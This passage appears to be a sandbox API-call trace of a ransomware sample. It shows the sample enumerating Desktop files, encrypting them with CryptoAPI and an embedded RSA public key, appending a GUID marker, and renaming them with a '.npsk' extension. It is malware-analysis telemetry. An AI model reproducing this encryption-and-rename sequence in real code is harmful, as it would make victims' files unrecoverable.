pdwDataLen=0x397fa54) returned 1 [0214.852] GetLastError () returned 0x0 [0214.852] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.852] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.852] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.852] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.852] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.852] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.853] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.853] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15c9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.853] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.854] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.854] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.854] CloseHandle (hObject=0x61c) returned 1 [0214.856] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mBKyb79uIbJvVDPK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mbkyb79uibjvvdpk.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mBKyb79uIbJvVDPK.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mbkyb79uibjvvdpk.png.npsk")) returned 1 [0214.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.856] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.856] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.858] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.858] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e70e460, ftCreationTime.dwHighDateTime=0x1d5e6e1, ftLastAccessTime.dwLowDateTime=0x61bfe9a0, ftLastAccessTime.dwHighDateTime=0x1d5d917, ftLastWriteTime.dwLowDateTime=0x61bfe9a0, ftLastWriteTime.dwHighDateTime=0x1d5d917, nFileSizeHigh=0x0, nFileSizeLow=0x156bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mL4ugr.m4a", cAlternateFileName="")) returned 1 [0214.858] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mL4ugr.m4a") returned=".m4a" [0214.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mL4ugr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml4ugr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.858] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=87740) returned 1 [0214.858] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.860] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15696, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.860] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.864] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x156bc, lpOverlapped=0x0) returned 1 [0214.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.865] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.866] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.866] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.866] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.866] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.866] GetLastError () returned 0x0 [0214.866] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.866] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.867] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.867] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.867] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.867] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.867] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.868] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x156bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.868] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.868] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.868] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.868] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.869] CloseHandle (hObject=0x61c) returned 1 [0214.871] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mL4ugr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml4ugr.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mL4ugr.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ml4ugr.m4a.npsk")) returned 1 [0214.871] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.871] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.871] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.873] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.873] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577bc8b0, ftCreationTime.dwHighDateTime=0x1d5e7b3, ftLastAccessTime.dwLowDateTime=0x33846820, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x33846820, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x2bb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mM8UwaBzXlnz.swf", cAlternateFileName="MM8UWA~1.SWF")) returned 1 [0214.873] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mM8UwaBzXlnz.swf") returned=".swf" [0214.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mM8UwaBzXlnz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm8uwabzxlnz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.873] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=11193) returned 1 [0214.873] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.875] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2b93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.875] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.877] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2bb9, lpOverlapped=0x0) returned 1 [0214.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.878] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.879] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.879] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.879] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.879] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.879] GetLastError () returned 0x0 [0214.879] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.880] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.880] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.880] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.880] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.880] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.880] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.880] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.880] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2bb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.880] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.881] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.881] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.881] CloseHandle (hObject=0x61c) returned 1 [0214.886] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mM8UwaBzXlnz.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm8uwabzxlnz.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mM8UwaBzXlnz.swf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mm8uwabzxlnz.swf.npsk")) returned 1 [0214.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.887] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.888] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpV84iMo", cAlternateFileName="")) returned 1 [0214.888] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a30df0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xc84fc690, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xc84fc690, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xc90f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OKUWlfXXOAa.jpg", cAlternateFileName="OKUWLF~1.JPG")) returned 1 [0214.888] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OKUWlfXXOAa.jpg") returned=".jpg" [0214.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OKUWlfXXOAa.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\okuwlfxxoaa.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.889] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=51471) returned 1 [0214.889] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.890] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc8e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.891] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.891] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc90f, lpOverlapped=0x0) returned 1 [0214.892] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.892] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.892] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.892] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.893] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.893] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.893] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.893] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.893] GetLastError () returned 0x0 [0214.893] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.893] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.893] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.893] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.893] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.894] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.894] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc90f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.894] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.895] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.895] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.895] CloseHandle (hObject=0x61c) returned 1 [0214.896] MoveFileW 